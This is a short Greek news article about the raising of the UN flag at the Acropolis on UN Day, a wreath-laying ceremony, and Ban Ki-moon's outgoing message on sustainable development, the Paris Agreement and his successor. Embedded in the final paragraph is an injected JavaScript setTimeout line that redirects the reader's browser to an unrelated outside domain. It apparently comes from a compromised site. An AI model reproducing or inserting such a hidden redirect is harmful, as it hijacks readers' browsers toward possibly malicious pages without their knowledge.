Έπαρση σημαίας ΟΗΕ στην Ακρόπολη – Μήνυμα Μπαν Κι Μουν

0
2

 

Παγκόσμια Ημέρα ΟΗΕ είναι σήμερα και με αφορμή τον εορστασμό έγινε έπαρση της σημαίας του Οργανισμού μαζί με την ελληνική σημαία.

Η έπαρση της σημαίας του ΟΗΕ στην Ακρόπολη σηματοδοτεί τη σύνδεση του Οργανισμού με την αρχαία και σύγχρονη Ελλάδα της Δημοκρατίας. Η Ελλάδα είναι ιδρυτικό μέλος του Οργανισμού ενώ διετέλεσε και δύο φορές μη μόνιμο μέλος του Συμβουλίου Ασφαλείας.

Ακολούθησε κατάθεση στεφάνων στο Μνημείο του Αγνωστου Στρατιώτη από εκπροσώπους του υπουργείου Εξωτερικών και της Περιφέρειας Αττικής, τον αντιδήμαρχο Αθηναίων, Λευτέρη Παπαγιαννάκη, και τον επικεφαλής του γραφείου της Ύπατης Αρμοστείας του ΟΗΕ για τους Πρόσφυγες στην Ελλάδα, Φιλίπ Λεκλέρκ.

Νωρίτερα, ο απερχόμενος γενικός γραμματέας του ΟΗΕ Μπαν Κι Μουν απηύθυνε μήνυμα με αφορμή ην ημέρα και τόνισε: «Η φετινή Ημέρα του ΟΗΕ γιορτάζεται σε μια μεταβατική περίοδο για τον κόσμο και τα Ηνωμένα Έθνη».

Και προσθέτει: «Εφέτος, που ο Οργανισμός διανύει το 71ο έτος του, έχουν τεθεί 17 στόχοι για τη Βιώσιμη Ανάπτυξη «που θα μας οδηγήσουν όλους σε ένα καλύτερο μέλλον πάνω σε έναν υγιή πλανήτη».

Κάνει, μάλιστα, ειδική μνεία στη Συμφωνία του Παρισιού για την Κλιματική Αλλαγή, που τα κράτη μέλη υιοθέτησαν «σε χρόνο ρεκόρ» και η οποία θα τεθεί σε ισχύ στις 4 Νοεμβρίου. «Σε όλο αυτό το ιστορικό ξεκίνημα βρίσκεται η καλύτερή μας ευκαιρία για πιο πράσινη, καθαρότερη και με χαμηλές εκπομπές άνθρακα ανάπτυξη» συνεχίζει. Ο Μπαν Κι-Μουν δεν παραλείπει να αναφερθεί και στην ανάληψη των καθηκόντων του νέου, ένατου κατά σειρά, γενικού γραμματέα του ΟΗΕ και καλεί τους ανθρώπους «σε κάθε γωνιά του πλανήτη» να παράσχουν την πλήρη υποστήριξή τους στον Αντόνιο Γκουτέρες «για να συνεχιστεί η παγκόσμια αποστολή μας για ειρήνη, βιώσιμη ανάπτυξη και ανθρώπινα δικαιώματα». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here